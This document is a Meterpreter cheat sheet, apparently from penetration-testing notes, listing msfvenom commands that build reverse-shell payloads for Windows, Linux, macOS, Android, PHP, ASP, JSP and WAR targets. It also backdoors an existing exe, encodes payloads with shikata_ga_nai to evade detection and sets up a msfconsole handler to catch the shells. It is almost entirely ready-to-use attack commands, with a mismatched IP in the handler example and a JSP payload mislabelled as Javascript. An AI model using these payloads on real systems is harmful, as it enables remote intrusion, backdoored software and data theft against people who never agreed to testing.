---
id: meterpreter
title: Meterpreter CheatSheet
sidebar_label: Meterpreter
---

## Binaries
Command 	Info

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > PAYLOAD.exe`  
Creates a simple TCP Payload for Windows  
`msfvenom -p windows/meterpreter/reverse_http LHOST=[IP] LPORT=[PORT] -f exe > PAYLOAD.exe`  
Creates a simple HTTP Payload for Windows  
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f elf > PAYLOAD.elf`  
Creates a simple TCP Shell for Linux  
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f macho > PAYLOAD.macho`  
Creates a simple TCP Shell for Mac  
`msfvenom -p android/meterpreter/reverse/tcp LHOST=[IP] LPORT=[PORT] R > PAYLOAD.apk`  
Creats a simple TCP Payload for Android  

## Web Payloads
Command 	Info

`msfvenom -p php/meterpreter_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > PAYLOAD.php`  
Creats a Simple TCP Shell for PHP  
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > PAYLOAD.asp`  
Creats a Simple TCP Shell for ASP  
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > PAYLOAD.jsp`  
Creats a Simple TCP Shell for Javascript  
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f war > PAYLOAD.war`  
Creats a Simple TCP Shell for WAR  

## Windows Payloads
Command 	Info

`msfvenom -l encoders` 	Lists all avalaible encoders  
`msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > PAYLOAD.exe`  
Binds an exe with a Payload (Backdoors an exe)  
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > PAYLOAD.exe`  
Creates a simple TCP payload with shikata_ga_nai encoder  
`msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > PAYLOAD.exe`  
Binds an exe with a Payload and encodes it  



## Setup handler
```bash
:~$ sudo msfconsole  
msf > use exploit/multi/handler  
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
msf exploit(multi/handler) > set lhost 11.1.1.11  
lhost => 192.168.1.123  
msf exploit(multi/handler) > set lport 4444  
lport => 4444  
msf exploit(multi/handler) > run  
```
